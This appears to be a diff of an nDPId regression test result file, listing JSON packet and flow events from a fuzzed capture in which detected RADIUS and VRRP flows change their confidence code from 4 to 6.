00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1528997403841,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997403841,"pkt":"ABRP+4rqUtuYVcUnCABFAADhAMdAAPwRUwNI4hk1CgxAHgcUchAAzZCBC1YAxcgsJl6LYV\/S6USqzg063n4BZDAzMTE0ODAwNzM2MzgwNzJAd01hbi55bmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmE2MTIvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjI0T0oBAgBIFwEAAAEFAADHRYXcoWwXwUZiNDAUiPZYAgUAAKf5M2Yd6gAAEyJCfEY39q2LAQACCwUAABPeNlqa\/2jA+R6oV5E\/laFQEt3nRw9TK906hgwY5FpY4\/w="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997403841,"flow_last_seen":1528997403841,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997403841,"l3_proto":"ip4","src_ip":"72.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00670{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00601{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997134036,"flow_last_seen":1528997134036,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.120.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997212627,"flow_last_seen":1528997212627,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"206.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00703{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1528996068129,"flow_last_seen":1528997404349,"flow_idle_time":200000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":37428,"flow_avg_l4_payload_len":450,"midstream":0,"thread_ts_msec":1528997404349,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476267} 
01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"AAAMB6xAABRPqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476466} 
00607{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"ABRP+4rqcNuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1528997476761,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997476761,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":200000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997294408,"flow_last_seen":1528997294408,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.28.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1528997050187,"flow_last_seen":1528997259951,"flow_idle_time":200000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":4564,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.62","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":200000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} -00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
-00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997265856,"flow_last_seen":1528997265856,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":30224,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997257373,"flow_last_seen":1528997257373,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.230.25.62","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997266054,"flow_last_seen":1528997266054,"flow_idle_time":200000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997476957,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.56.64.30","src_port":1812,"dst_port":9472,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1528997632285,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997632285,"pkt":"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"} -00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} +00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":620000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"6":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00200{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17664,"global_ts_msec":1528997632478} 
00715{"packet_event_id":1,"packet_event_name":"packet","packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17664,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997632285,"pkt":"ABRP+4rqcNuYVcUnRQBFAAEwA2FAAPwRUBrG4hk1CgxAHgcUchABHGYCAlsBFPJGkwRL+pjdA5197qGahcwaCwAAV8gbBVNQQxpuAAABNxA06\/sNxTnxG6ukTqwhWbbA2iqJ9xUQWB4T5BwZI+vaxI+7bs\/vfw\/eMzQ3J3YR5Fh5RZWRNDm4c5zmNtk9aBmMKxf9+K7wySD8NYXouGgH0g5FMhfbrMBBWqKOxwRMjh\/pBwtArUnjATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNmZmLzAwOjU2OmNkOjZkOjQyOjU5LzIyNyUAMjAxMjU0NDIzNRIJU3Vj42VzcxkFU1BDTwYDAgAEUBLN9Y5G45qq3LYn60raic1U"} -00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":200000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 
